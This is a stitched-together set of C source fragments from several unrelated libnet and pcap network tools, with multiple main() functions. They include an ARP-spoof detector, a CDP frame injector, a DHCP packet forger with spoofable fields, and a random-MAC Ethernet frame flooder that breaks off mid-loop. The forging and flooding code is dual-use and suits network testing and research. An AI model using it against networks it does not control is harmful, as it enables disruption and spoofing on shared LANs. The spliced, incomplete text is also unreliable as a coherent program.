printf ("\n unknown option character `\\x%x'\n", optopt);
print_usage ();
exit (EXIT_FAILURE);
}
default:
print_usage ();
exit (EXIT_FAILURE);
}
}
if (0 == flags) { config->flags = SYN; }
else if (ACK == flags) { config->a_scan_type = "ACK_SCAN"; }
else if (RST == flags) { config->a_scan_type = "RST_SCAN"; }
else if (SYN == flags) { config->a_scan_type = "SYN_SCAN"; }
else if (FIN == flags) { config->a_scan_type = "FIN_SCAN"; }
/* print an ASCII-ART banner */
print_banner ();
switch (config->dport) {
case HTTP:
config->a_port_name = "HTTP";
break;
case FTP:
config->a_port_name = "FTP";
break;
case TELNET:
config->a_port_name = "TELNET";
break;
case SSH:
config->a_port_name = "SSH";
break;
case SMTP:
config->a_port_name = "SMTP";
break;
default:
config->a_port_name = "UNKNOWN";
break;
}
/* check if we are root, else exit */
if (0 != getuid ()) {
printf ("\n [!] you need to be root buddy...\n\n");
exit (EXIT_FAILURE);
}
/* find a capture device if not specified on command-line */
if (config->dev == NULL) {
config->dev = pcap_lookupdev (errbuf);
if (config->dev == NULL) {
printf ("\n [-] could not find default device: %s\n\n", errbuf);
exit (EXIT_FAILURE);
}
}
/* initialize libnet library to find local mac and ip addresses */
l = libnet_init (LIBNET_LINK, config->dev, libnet_errbuf);
if (NULL == l) {
printf ("\n [-] libnet_init() failed: %s\n\n", libnet_errbuf);
exit (EXIT_FAILURE);
}
/* fetch local mac address */
config->macaddr = libnet_get_hwaddr (l);
if (NULL == config->macaddr) {
printf ("\n [-] could not fetch local mac address: %s\n\n", libnet_geterror (l));
libnet_destroy (l);
exit (EXIT_FAILURE);
} else {
snprintf (config->llmac, 18, "%02x:%02x:%02x:%02x:%02x:%02x",
config->macaddr->ether_addr_octet[0], config->macaddr->ether_addr_octet[1],
config->macaddr->ether_addr_octet[2], config->macaddr->ether_addr_octet[3],
config->macaddr->ether_addr_octet[4], config->macaddr->ether_addr_octet[5]);
}
/* fetch local ip address */
config->ipaddr = libnet_get_ipaddr4 (l);
if (-1 == config->ipaddr) {
printf ("\n [-] could not fetch local ip address: %s\n\n", libnet_geterror (l));
libnet_destroy (l);
exit (EXIT_FAILURE);
} else {
snprintf (config->llip, 16, "%s", libnet_addr2name4 (config->ipaddr, LIBNET_DONT_RESOLVE));
}
printf (" [+] session started at %s \n", start_time);
printf (" [+] default configuration and cmd-line parameters loaded\n");
printf (" [+] device: \"%s\", mode: \"%s\", port: \"%s\", scan-type: \"%s\"\n",
config->dev, (config->mode)? "PREVENT" : "DETECT", config->a_port_name, config->a_scan_type);
/* start repeat loop */
/* call sniffer module to fill up our config struct with packet fields */
printf (" [+] calling arp-sniffer module to capture incoming arp packets\n");
config = sniffer (config);
printf ("\n [+] above arp packet was captured and respective fields were saved for analysis\n");
printf (" [+] calling anamoly-detection module to perform static analysis on saved packet fields\n");
/* call static_analysis module to perform some static checks on packet fields */
valid = static_analysis (conf);
if (EXIT_FAILURE == valid) {
printf (" [+] analyzed arp packet seems to be specially-crafted. kernel might have added the"
" poisonous SIP-SMAC entry in arp cache\n");
if (DETECT == conf.mode) {
printf (" [+] you need to clean up arp cache manually. delete entry for SIP (%s) - SMAC (%s)\n",
conf.a_sip, conf.a_sha);
printf (" [+] to automate this process, please terminate this session and restart arp-secur"
" in PREVENT mode, i.e with -P switch\n");
} else if (PREVENT == conf.mode) {
printf (" [+] cleaning up arp cache by deleting entry for SIP (%s) - SMAC (%s)\n",
conf.a_sip, conf.a_sha);
cache_cleanup (conf.a_sip, conf.a_sha);
}
} else {
printf (" [+] analyzed arp packet does not seem to be specially-crafted\n");
/* check if we have already processed (and validated) the ip-mac pair... */
if (0 < conf.queue_size) {
printf (" [+] calling known-traffic-filter module to check if we have validated"
" IP - MAC (%s - %s) pair earlier (queue_size: %d)\n",
conf.a_sip, conf.a_sha, conf.queue_size);
known_traffic_filter (start, conf.a_sip, conf.a_sha, conf.queue_size);
} else {
printf (" [+] no IP-MAC pairs have been validated yet (queue_size: %d)\n", conf.queue_size);
}
/* ...hmmm, seems to be a new mac-ip pair. let's validate it then... */
printf (" [+] calling spoof-detection module to validate IP - MAC (%s - %s) pair\n", conf.a_sip, conf.a_sha);
valid = spoof_detector (conf, start, end);
if (0 == valid) {
printf ("\n [+] try other scan types before determining the validity of the IP - MAC (%s - %s)\n",
conf.a_sip, conf.a_sha);
if (DETECT == conf.mode) {
printf (" [+] for safety reasons, you need to clean up arp cache manually."
" delete entry for (%s - %s)\n", conf.a_sip, conf.a_sha);
printf (" [+] to automate this process from now onwards,"
" restart arp-secur in PREVENT mode, i.e with -P switch\n");
} else if (PREVENT == conf.mode) {
printf (" [+] cleaning up arp cache by deleting entry for SIP (%s) - SMAC (%s)\n",
conf.a_sip, conf.a_sha);
cache_cleanup (conf.a_sip, conf.a_sha);
}
}
/* display session summary in a system popup notification */
if (1 == showpopup) {
alert (conf.a_sip, conf.a_sha, valid);
}
/* end repeat loop */
/* end arp-secur session */
bcurtime = time (NULL);
bloctime = localtime (&bcurtime);
strftime (end_time, 24, "%d/%b/%Y %H:%M:%S", bloctime);
printf ("\n [+] session finished at %s\n\n", end_time);
}
return 0;
}//main
int
main(int argc, char *argv[])
{
int c;
char errbuf[256];
char *device = NULL;
struct libnet_link_int *l;
struct ether_addr *e;
u_long i;
while ((c = getopt(argc, argv, "i:")) != EOF)
{
switch (c)
{
case 'i':
device = optarg;
break;
default:
exit(EXIT_FAILURE);
}
}
if (!device)
{
fprintf(stderr, "Specify a device\n");
exit(EXIT_FAILURE);
}
l = libnet_open_link_interface(device, errbuf);
if (!l)
{
fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
exit(EXIT_FAILURE);
}
printf("Interface %s\n", device);
e = libnet_get_hwaddr(l, device, errbuf);
if (!e)
{
fprintf(stderr, "Can't get hardware address: %s\n", errbuf);
exit(EXIT_FAILURE);
}
else
{
printf("MAC address: ");
for (c = 0; c < 6; c++)
{
printf("%x", e->ether_addr_octet[c]);
if (c != 5)
{
printf(":");
}
}
printf("\n");
}
i = libnet_get_ipaddr(l, device, errbuf);
if (!i)
{
fprintf(stderr, "Can't get ip address: %s\n", errbuf);
exit(EXIT_FAILURE);
}
else
{
printf("IP address: ");
printf("%s\n", libnet_host_lookup(ntohl(i), 0));
}
exit(EXIT_SUCCESS);
}
int
libnet_win32_write_raw_ipv4(libnet_t *l, const uint8_t *payload, uint32_t payload_s)
{
static BYTE dst[ETHER_ADDR_LEN];
static BYTE src[ETHER_ADDR_LEN];
uint8_t *packet = NULL;
uint32_t packet_s;
LPPACKET lpPacket = NULL;
DWORD remoteip = 0;
DWORD BytesTransfered;
NetType type;
struct libnet_ipv4_hdr *ip_hdr = NULL;
memset(dst, 0, sizeof(dst));
memset(src, 0, sizeof(src));
packet_s = payload_s + l->link_offset;
packet = (uint8_t *)malloc(packet_s);
if (packet == NULL)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): failed to allocate packet\n", __func__);
return (-1);
}
/* we have to do the IP checksum */
if (libnet_do_checksum(l, payload, IPPROTO_IP, LIBNET_IPV4_H) == -1)
{
/* error msg set in libnet_do_checksum */
return (-1);
}
/* MACs, IPs and other stuff... */
ip_hdr = (struct libnet_ipv4_hdr *)payload;
memcpy(src, libnet_get_hwaddr(l), sizeof(src));
remoteip = ip_hdr->ip_dst.S_un.S_addr;
/* check if the remote station is the local station */
if (remoteip == libnet_get_ipaddr4(l))
{
memcpy(dst, src, sizeof(dst));
}
else
{
memcpy(dst, libnet_win32_get_remote_mac(l, remoteip), sizeof(dst));
}
PacketGetNetType(l->lpAdapter, &type);
switch(type.LinkType)
{
case NdisMedium802_3:
libnet_win32_build_fake_ethernet(dst, src, ETHERTYPE_IP, payload,
payload_s, packet, l , 0);
break;
case NdisMedium802_5:
libnet_win32_build_fake_token(dst, src, ETHERTYPE_IP, payload,
payload_s, packet, l, 0);
break;
case NdisMediumFddi:
break;
case NdisMediumWan:
case NdisMediumAtm:
case NdisMediumArcnet878_2:
default:
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): network type (%d) is not supported\n", __func__,
type.LinkType);
return (-1);
break;
}
BytesTransfered = -1;
if ((lpPacket = PacketAllocatePacket()) == NULL)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): failed to allocate the LPPACKET structure\n", __func__);
return (-1);
}
PacketInitPacket(lpPacket, packet, packet_s);
/* PacketSendPacket returns a BOOLEAN */
if (PacketSendPacket(l->lpAdapter, lpPacket, TRUE))
{
BytesTransfered = packet_s;
}
PacketFreePacket(lpPacket);
free(packet);
return (BytesTransfered);
}
int
main(int argc, char *argv[])
{
int c, len, index;
libnet_t *l;
libnet_ptag_t t;
u_char *value;
u_char values[100];
u_short tmp;
char errbuf[LIBNET_ERRBUF_SIZE];
u_int8_t oui[3] = { 0x00, 0x00, 0x0c };
u_int8_t cdp_mac[6] = {0x01, 0x0, 0xc, 0xcc, 0xcc, 0xcc};
if (argc != 3)
{
fprintf(stderr, "usage %s device device-id\n", argv[0]);
return (EXIT_FAILURE);
}
fprintf(stderr, "cdppoke...\n");
l = libnet_init(LIBNET_LINK, argv[1], errbuf);
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
return (EXIT_FAILURE);
}
/* build the TLV's by hand until we get something better */
memset(values, 0, sizeof(values));
index = 0;
tmp = htons(LIBNET_CDP_VERSION);
memcpy(values, &tmp, 2);
index += 2;
tmp = htons(9); /* length of string below plus type and length fields */
memcpy(values + index, &tmp, 2);
index += 2;
memcpy(values + index, (u_char *)"1.1.1", 5);
index += 5;
/* this TLV is handled by the libnet builder */
value = argv[2];
len = strlen(argv[2]);
/* build CDP header */
t = libnet_build_cdp(
1, /* version */
30, /* time to live */
0x0, /* checksum */
0x1, /* type */
len, /* length */
value, /* value */
values, /* payload */
index, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build CDP header: %s\n", libnet_geterror(l));
goto bad;
}
/* build 802.2 header */
t = libnet_build_802_2snap(
LIBNET_SAP_SNAP, /* SAP SNAP code */
LIBNET_SAP_SNAP, /* SAP SNAP code */
0x03, /* control */
oui, /* OUI */
0x2000, /* upper layer protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build SNAP header: %s\n", libnet_geterror(l));
goto bad;
}
/* build 802.3 header */
t = libnet_build_802_3(
cdp_mac, /* ethernet destination */
(u_int8_t *)libnet_get_hwaddr(l), /* ethernet source */
LIBNET_802_2_H + LIBNET_802_2SNAP_H + LIBNET_CDP_H, /* packet len */
NULL, /* payload */
0, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build 802.3 header: %s\n", libnet_geterror(l));
goto bad;
}
/* write the packet out */
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte CDP frame \"%s\"\n", c, argv[2]);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main(int argc, char **argv) {
int ch, dhcp_payload_len;
unsigned char *dhcp_payload;
libnet_ptag_t ptag_dhcpv4, ptag_udp, ptag_ipv4, ptag_ethernet;
char *arg_secs, *arg_cip, *arg_chaddr, *arg_sip, *arg_ifname;
char *arg_operation, *arg_timeout, *arg_xid, *arg_flags, *arg_yip;
char *arg_gip, *arg_sname, *arg_fname, *arg_ether_dst, *stmp;
char *arg_ipv4_src, *arg_ipv4_dst, *arg_ipv4_tos, *arg_ipv4_ttl;
char *arg_reply_count;
if (argc < 2) usage("too few arguments");
srandom(time(NULL));
arg_secs = arg_cip = arg_chaddr = arg_sip = arg_ifname = NULL;
arg_operation = arg_timeout = arg_xid = arg_flags = arg_yip = NULL;
arg_gip = arg_sname = arg_fname = arg_ether_dst = arg_reply_count = NULL;
arg_ipv4_src = arg_ipv4_dst = arg_ipv4_tos = arg_ipv4_ttl = NULL;
verbosity = 1;
while ((ch = getopt(argc, argv, "s:c:h:i:o:t:x:f:y:g:S:A:B:O:X:v:F:T:L:Q:E:w:n:m")) != -1) {
switch (ch) {
case 's': arg_secs = optarg; break;
case 'c': arg_cip = optarg; break;
case 'h': arg_chaddr = optarg; break;
case 'S': arg_sip = optarg; break;
case 'i': arg_ifname = optarg; break;
case 'o': arg_operation = optarg; break;
case 't': arg_timeout = optarg; break;
case 'x': arg_xid = optarg; break;
case 'f': arg_flags = optarg; break;
case 'y': arg_yip = optarg; break;
case 'B': arg_fname = optarg; break;
case 'A': arg_sname = optarg; break;
case 'g': arg_gip = optarg; break;
case 'F': arg_ipv4_src = optarg; break;
case 'T': arg_ipv4_dst = optarg; break;
case 'L': arg_ipv4_ttl = optarg; break;
case 'Q': arg_ipv4_tos = optarg; break;
case 'n': arg_reply_count = optarg; break;
case 'E': arg_ether_dst = optarg; break;
case 'v': verbosity = atoi(optarg); break;
case 'm': no_double_options = 0; break;
case 'O': add_option(optarg); break;
case 'X': add_hexoption(optarg); break;
case 'w': option_lookup(optarg); break;
case '?':
default:
usage("unknown argument");
}
}
argc -= optind;
argv += optind;
/* Set some basic defaults */
set_defaults();
/* Make sure network interface was specified with -i option */
if (arg_ifname == NULL) {
usage("Error: network interface (-i option) not specified.");
}
strncpy(ifname, arg_ifname, 99);
/* Try to have pcap and libnet use the interface */
pcp = pcap_open_live(ifname, SNAPLEN, 1, 1, pcap_errbuf);
if (pcp == NULL) {
printf("pcap_open_live(%s) failed! Did you give the right interface name "
"and are you root?\n", ifname);
printf("pcap said: %s\n", pcap_errbuf);
exit(1);
}
lnp = libnet_init(LIBNET_LINK, ifname, libnet_errbuf);
if (lnp == NULL) {
printf("libnet_init(%s) failed!\n", ifname);
printf("libnet said: %s\n", libnet_errbuf);
exit(1);
}
/* Set chaddr MAC address */
if (arg_chaddr != NULL) {
int len = ETHER_ADDR_LEN;
/*chaddr = libnet_hex_aton((int8_t *)arg_chaddr, &len);*/
chaddr = libnet_hex_aton(arg_chaddr, &len);
if (chaddr == NULL) {
if (verbosity > 0)
printf("Invalid chaddr MAC address specified (%s)\n", arg_chaddr);
exit(1);
}
}
else {
/* Try to retrieve MAC address using libnet */
chaddr = (u_int8_t *)libnet_get_hwaddr(lnp);
if (chaddr == NULL) {
if (verbosity > 1) {
printf("Failed to retrieve MAC address for interface %s, using 0:0:0:0:0:0\n"
"Libnet said: %s\n", ifname, libnet_errbuf);
}
memset(chaddr, 0, ETHER_ADDR_LEN);
}
}
/* Set cip address */
if (arg_cip != NULL) {
cip = inet_addr(arg_cip);
if (cip == INADDR_NONE) {
if (verbosity > 0)
printf("Invalid cip address specified (%s)\n", arg_cip);
exit(1);
}
cip = ntohl(cip);
}
else {
/* Try to retrieve IP address using libnet */
cip = libnet_get_ipaddr4(lnp);
if ((int)cip == -1) {
if (verbosity > 1) {
printf("Failed to retrieve IPv4 address for interface %s, using cip 0.0.0.0\n"
"Libnet said: %s\n", ifname, libnet_errbuf);
}
cip = inet_addr("0.0.0.0");
}
else
cip = htonl(cip);
}
/**************************/
/* Set various parameters */
/**************************/
if (arg_operation != NULL) {
if (option_added(LIBNET_DHCP_MESSAGETYPE) && no_double_options) {
if (verbosity > 0) {
printf("Error: DHCP messagetype specified twice (don't use -o option if\n"
" you also intend to use -O to set option 53 (messagetype))\n");
}
exit(1);
}
if (strcasecmp(arg_operation, "discover") == 0) {
operation = LIBNET_DHCP_MSGDISCOVER;
if (arg_timeout == NULL)
timeout = 5;
}
else if (strcasecmp(arg_operation, "request") == 0) {
operation = LIBNET_DHCP_MSGREQUEST;
if (arg_timeout == NULL)
timeout = 5;
}
else if (strcasecmp(arg_operation, "inform") == 0) {
operation = LIBNET_DHCP_MSGINFORM;
if (timeout == 0)
timeout = 5;
}
else if (strcasecmp(arg_operation, "release") == 0)
operation = LIBNET_DHCP_MSGRELEASE;
else if (strcasecmp(arg_operation, "decline") == 0)
operation = LIBNET_DHCP_MSGDECLINE;
else {
if (verbosity > 0)
usage("Invalid DHCP operation type");
else
exit(1);
}
/* Add MESSAGETYPE DHCP option */
num_options++;
options = (struct dhcp_option *)
realloc(options, num_options * sizeof(struct dhcp_option));
options[num_options-1].opnum = LIBNET_DHCP_MESSAGETYPE;
options[num_options-1].oplen = 1;
options[num_options-1].opdata[0] = operation;
}
else {
/* no "-o operation" argument given */
if (option_added(LIBNET_DHCP_MESSAGETYPE) == 0) {
/* Add MESSAGETYPE DHCP option */
num_options++;
options = (struct dhcp_option *)
realloc(options, num_options * sizeof(struct dhcp_option));
options[num_options-1].opnum = LIBNET_DHCP_MESSAGETYPE;
options[num_options-1].oplen = 1;
options[num_options-1].opdata[0] = operation;
}
}
if (arg_secs != NULL) {
unsigned long ultmp;
ultmp = strtoul(arg_secs, &stmp, 0);
if (*stmp != '\0' || ultmp > 65535) {
if (verbosity > 0)
printf("Error: secs must be 0-65535 (was: %s)\n",
arg_secs);
exit(1);
}
secs = (u_int16_t)ultmp;
}
if (arg_timeout != NULL) {
timeout = strtoul(arg_timeout, &stmp, 0);
if (*stmp != '\0') {
if (verbosity > 0)
printf("Error: timeout value must be 0 or a positive integer (was: %s)\n",
arg_timeout);
exit(1);
}
}
if (arg_reply_count != NULL) {
reply_count = strtoul(arg_reply_count, &stmp, 0);
if (*stmp != '\0') {
if (verbosity > 0)
printf("Error: reply_count value must be 0 or a positive integer (was: %s)\n",
arg_reply_count);
exit(1);
}
}
if (arg_xid != NULL) {
xid = strtoul(arg_xid, &stmp, 0);
if (*stmp != '\0') {
if (verbosity > 0)
printf("Error: xid value must be 0 or a positive integer (was: %s)\n",
arg_xid);
exit(1);
}
}
if (arg_flags != NULL) {
unsigned long ultmp;
ultmp = strtoul(arg_flags, &stmp, 0);
if (*stmp != '\0' || ultmp > 65535) {
if (verbosity > 0)
printf("Error: flags value must be 0-65535 (was: %s)\n",
arg_flags);
exit(1);
}
flags = (u_int16_t)ultmp;
}
if (arg_sip != NULL) {
sip = inet_addr(arg_sip);
if (sip == INADDR_NONE) {
if (verbosity > 0)
printf("Error: specified sip value is not a valid IPv4 address (was: %s)\n",
arg_sip);
exit(1);
}
}
if (arg_yip != NULL) {
yip = inet_addr(arg_yip);
if (yip == INADDR_NONE) {
if (verbosity > 0)
printf("Error: specified yip value is not a valid IPv4 address (was: %s)\n",
arg_yip);
exit(1);
}
}
if (arg_gip != NULL) {
gip = inet_addr(arg_gip);
if (gip == INADDR_NONE) {
if (verbosity > 0)
printf("Error: specified gip value is not a valid IPv4 address (was: %s)\n",
arg_gip);
exit(1);
}
}
if (arg_fname != NULL) {
fname = (char *)malloc(strlen(fname)+1);
strcpy(fname, arg_fname);
}
if (arg_sname != NULL) {
sname = (char *)malloc(strlen(sname)+1);
strcpy(sname, arg_sname);
}
if (arg_ipv4_src != NULL) {
ipv4_src = inet_addr(arg_ipv4_src);
if (ipv4_src == INADDR_NONE) {
if (verbosity > 0)
printf("Error: specified ipv4_src value is not a valid IPv4 address (was: %s)\n",
arg_ipv4_src);
exit(1);
}
}
if (arg_ipv4_dst != NULL) {
ipv4_dst = inet_addr(arg_ipv4_dst);
if (ipv4_dst == INADDR_NONE) {
if (verbosity > 0)
printf("Error: specified ipv4_dst value is not a valid IPv4 address (was: %s)\n",
arg_ipv4_dst);
exit(1);
}
}
if (arg_ipv4_ttl != NULL) {
unsigned long ultmp;
ultmp = strtoul(arg_ipv4_ttl, &stmp, 0);
if (*stmp != '\0' || ultmp > 255) {
if (verbosity > 0)
printf("Error: ipv4_ttl value must be 0-255 (was: %s)\n",
arg_xid);
exit(1);
}
ipv4_ttl = (u_int8_t)ultmp;
}
if (arg_ipv4_tos != NULL) {
unsigned long ultmp;
ultmp = strtoul(arg_ipv4_tos, &stmp, 0);
if (*stmp != '\0' || ultmp > 255) {
if (verbosity > 0)
printf("Error: ipv4_tos value must be 0-255 (was: %s)\n",
arg_ipv4_tos);
exit(1);
}
ipv4_tos = (u_int8_t)ultmp;
}
if (arg_ether_dst != NULL) {
int l = ETHER_ADDR_LEN;
/*ether_dst = libnet_hex_aton((int8_t *)arg_ether_dst, &l);*/
ether_dst = libnet_hex_aton(arg_ether_dst, &l);
if (ether_dst == NULL) {
if (verbosity > 0)
printf("Error: invalid ethernet destination MAC specified (was: %s)\n",
arg_ether_dst);
exit(1);
}
}
/******************************
* Done setting parameters. *
* Start building DHCP packet *
******************************/
libnet_clear_packet(lnp);
/* Build DHCP payload (DHCP options section) */
dhcp_payload = build_payload(&dhcp_payload_len);
/* Create DHCP message */
ptag_dhcpv4 =
libnet_build_dhcpv4(LIBNET_DHCP_REQUEST,
BOOTP_HTYPE_ETHER,
ETHER_ADDR_LEN,
BOOTP_HOPCOUNT,
xid,
secs,
flags,
cip,
yip,
sip,
gip,
chaddr,
sname,
fname,
dhcp_payload,
dhcp_payload_len,
lnp,
0);
if (ptag_dhcpv4 == -1) {
printf("Failed to build bootp packet: %s\n", libnet_errbuf);
exit(1);
}
/*
libnet_ptag_t
libnet_build_udp(u_int16_t sp, u_int16_t dp, u_int16_t len, u_int16_t sum,
u_int8_t *payload, u_int32_t payload_s, libnet_t *l, libnet_ptag_t ptag);
*/
/* Create UDP datagram */
ptag_udp =
libnet_build_udp(UDP_SRCPORT,
UDP_DSTPORT,
dhcp_payload_len + LIBNET_DHCPV4_H + LIBNET_UDP_H,
0,
NULL,
0,
lnp,
0);
if (ptag_udp == -1) {
printf("Failed to build udp packet: %s\n", libnet_errbuf);
exit(1);
}
/*
libnet_ptag_t
libnet_build_ipv4(u_int16_t len, u_int8_t tos, u_int16_t id, u_int16_t frag,
u_int8_t ttl, u_int8_t prot, u_int16_t sum, u_int32_t src, u_int32_t dst,
u_int8_t *payload, u_int32_t payload_s, libnet_t *l, libnet_ptag_t ptag);
*/
/* Create IPv4 datagram */
ptag_ipv4 =
libnet_build_ipv4(dhcp_payload_len + LIBNET_DHCPV4_H + LIBNET_UDP_H + LIBNET_IPV4_H,
ipv4_tos,
ipv4_id++,
0,
ipv4_ttl,
IPPROTO_UDP,
0,
ipv4_src,
ipv4_dst,
NULL,
0,
lnp,
0);
if (ptag_ipv4 == -1) {
printf("Failed to build ipv4 packet: %s\n", libnet_errbuf);
exit(1);
}
/* Create ethernet packet */
ptag_ethernet =
libnet_autobuild_ethernet(ether_dst,
ETHERTYPE_IP,
lnp);
if (ptag_ethernet == -1) {
printf("Failed to build ethernet packet: %s\n", libnet_errbuf);
exit(1);
}
/* Write packet to network */
if (libnet_write(lnp) == -1) {
printf("Failed to write ethernet packet to network: %s\n", libnet_errbuf);
exit(1);
}
/* If we have to wait and listen for server replies, we use
a timer and a signal handler to quit. We do this as libpcap
doesn't support non-blocking packet capture on some (many?)
platforms. We could have launched another thread also, but
using timers and signals is simpler.
*/
if (timeout > 0) {
struct itimerval itv;
itv.it_interval.tv_sec = itv.it_value.tv_sec = timeout;
itv.it_interval.tv_usec = itv.it_value.tv_usec = 0;
setitimer(ITIMER_REAL, &itv, NULL);
signal(SIGALRM, sighandler);
pcap_loop(pcp, -1, pcap_callback, NULL);
}
libnet_destroy(lnp);
pcap_close(pcp);
exit(0);
}
int main(int argc, char **argv)
{
u_char compare[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_char dhost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_char shost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
struct ether_header *ether = NULL;
u_int16_t proto = htons(ETHERTYPE_IP);
struct ether_addr *ea = NULL;
u_int16_t *data = NULL;
char dev[128] = "";
u_char *buf = NULL;
int proto_rand = 0;
struct timeval tv, tv2;
int max_len = ETHER_FRAME_SIZE;
u_long count = 0xffffffffl;
u_long data_pushed = 0;
struct ip *ip = NULL;
u_long data_len = 0;
int rand_source = 0;
int rand_dest = 0;
long mark = 1000;
u_long skip = 0; /* Skip how many packets */
u_long acx = 0;
int debug = 0;
u_int len = 0;
u_int cx = 0;
float sec;
int seed;
u_int c;
/* libnet variables */
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
seed = getpid();
while((c=getopt(argc, argv, "hi:s:d:k:p:r:c:l:Dvm:")) != (unsigned) EOF) {
switch (c) {
case 'i':
if (rindex(optarg, '/'))
strncpy(dev, (char *) rindex(optarg, '/')+1, 128);
else
strncpy(dev, optarg, 128);
dev[127] = '\0';
break;
case 's':
if ( strcmp(optarg, "rand") == 0 ) {
printf("Using random source MAC's\n");
shost[0] = 0xff;
rand_source = 1;
break;
}
bcopy(atoether(optarg), shost, 6);
break;
case 'd':
if ( strcmp(optarg, "rand") == 0 ) {
printf("Using random destination MAC's\n");
dhost[0] = 0xff;
rand_dest = 1;
break;
}
bcopy(atoether(optarg), dhost, 6);
break;
case 'r':
seed = atoi(optarg);
break;
case 'c':
count = atol(optarg);
break;
case 'm':
mark = atol(optarg);
if (mark <= 0)
exit(printf("Please use a positive arg for -m\n"));
break;
case 'k':
skip = atol(optarg);
printf("Will not transmit first %li packet(s).\n", skip);
break;
case 'D':
debug++;
break;
case 'l':
max_len = atoi(optarg);
if ( max_len > 1500 ) {
printf("Maximum Length of %i is longer than the max "
"ethernet frame size of %i\n", max_len,
ETHER_FRAME_SIZE);
exit(0);
}
if ( max_len < 14) {
printf("You seam to have entered %i as the maximum "
"length... Please make it >= 14\n", max_len);
exit(0);
}
break;
case 'p':
if ( strcasecmp(optarg, "rand") == 0 ) {
proto_rand++;
break;
}
proto_rand = 0;
proto = htons(atoi(optarg));
break;
case 'v':
printf("Version %s\n", VERSION);
exit(0);
case 'h':
default:
usage(argv[0]);
exit( 0 );
}
}
if ( *dev == '\0' ) {
usage(argv[0]);
exit( 0 );
}
/* Initialize libnet context, Root priviledges are required.*/
l = libnet_init(
LIBNET_LINK_ADV, /* injection type */
dev, /* network interface */
errbuf); /* error buffer */
if (l == NULL) {
fprintf(stderr, "Can not initialize libnet: %s", errbuf);
exit( -1 );
}
max_len -= 6 + 6 + 2;
printf("Seeding with %i\n", seed);
srand(seed);
if ( (buf = malloc(ETHER_FRAME_SIZE)) == NULL ) {
perror("malloc");
exit( -1 );
}
bzero(buf, ETHER_FRAME_SIZE);
ether = (struct ether_header *) buf;
if ( bcmp(dhost, compare, 6) == 0 )
memset(ether->ether_dhost, 0xff, 6);
else bcopy(dhost, ether->ether_dhost, 6);
if ( bcmp(shost, compare, 6) == 0 ) {
if ( (ea = (struct ether_addr *)libnet_get_hwaddr(l)) == 0 )
fprintf(stderr, "Cannot get MAC for %s: %s", dev, libnet_geterror(l));
bcopy(ea, ether->ether_shost, 6);
} else bcopy(shost, ether->ether_shost, 6);
printf("Maximum packet size (minus header) is %i bytes\n", max_len);
if ( proto_rand )
printf("Ethernet protocols will be randomized.\n");
else printf("Ethernet protocol will be %i.\n", ntohs(proto));
if ( !rand_dest )
printf("Sending to MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
ether->ether_dhost[0], ether->ether_dhost[1],
ether->ether_dhost[2], ether->ether_dhost[3],
ether->ether_dhost[4], ether->ether_dhost[5]);
else printf("Sending to random MAC addresses.\n");
if ( !rand_source )
printf("Sending from MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
ether->ether_shost[0], ether->ether_shost[1],
ether->ether_shost[2], ether->ether_shost[3],
ether->ether_shost[4], ether->ether_shost[5]);
else printf("Sending from random MAC addresses.\n");
ip = (struct ip *) (buf + 14);
data = (u_int16_t *) (buf + 14);
printf("Sending...\n");
gettimeofday(&tv, NULL);
for ( acx = 1; acx <= count; acx++ ) {
len = sizeof(struct ether_header);
if ( rand_source ) {
((u_int16_t *) ether->ether_shost)[0] = RAND16;
((u_int16_t *) ether->ether_shost)[1] = RAND16;
((u_int16_t *) ether->ether_shost)[2] = RAND16;
}
if ( rand_dest ) {
((u_int16_t *) ether->ether_dhost)[0] = RAND16;
((u_int16_t *) ether->ether_dhost)[1] = RAND16;
((u_int16_t *) ether->ether_dhost)[2] = RAND16;
}
if ( proto_rand )
ether->ether_type = RAND16;
else ether->ether_type = proto;
data_len = (u_int) (max_len * (rand()/((float) RAND_MAX + 1)));
data_len >>= 1;
for ( cx = 0; cx < data_len; cx++ )
data[cx] = RAND16;
data_len <<= 1;
if ( rand() & 0x1 ) {
data_len++;
data[cx] = RAND16;
}
len += data_len;
ip->ip_len = htons(data_len);
ip->ip_sum = 0;
libnet_do_checksum(l, (u_int8_t *) ip, IPPROTO_IP, data_len);
if ( debug ) {
printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x -> ",
ether->ether_shost[0], ether->ether_shost[1],
ether->ether_shost[2], ether->ether_shost[3],
ether->ether_shost[4], ether->ether_shost[5]);
printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\t",
ether->ether_dhost[0], ether->ether_dhost[1],
ether->ether_dhost[2], ether->ether_dhost[3],
ether->ether_dhost[4], ether->ether_dhost[5]);
switch( ntohs(ether->ether_type) ) {
case ETHERTYPE_IP:
printf("Proto IP \t");
break;
case ETHERTYPE_ARP:
printf("Proto ARP \t");
break;
case ETHERTYPE_PUP:
printf("Proto PUP \t");
break;
case ETHERTYPE_REVARP:
printf("Proto RARP\t");
break;
case ETHERTYPE_VLAN:
printf("Proto VLAN\t");
break;
default:
printf("Proto %u\t",
ntohs(ether->ether_type));
}
printf("Length %i\n", len);
}
if ( acx >= skip ) {
c = libnet_adv_write_link(l, buf, len);
if (c !=(u_int) -1)
data_pushed += c;
}
/* if ( c != len )
* perror("write_ll");
*/
if ( !(acx % mark) ) {
gettimeofday(&tv2, NULL);
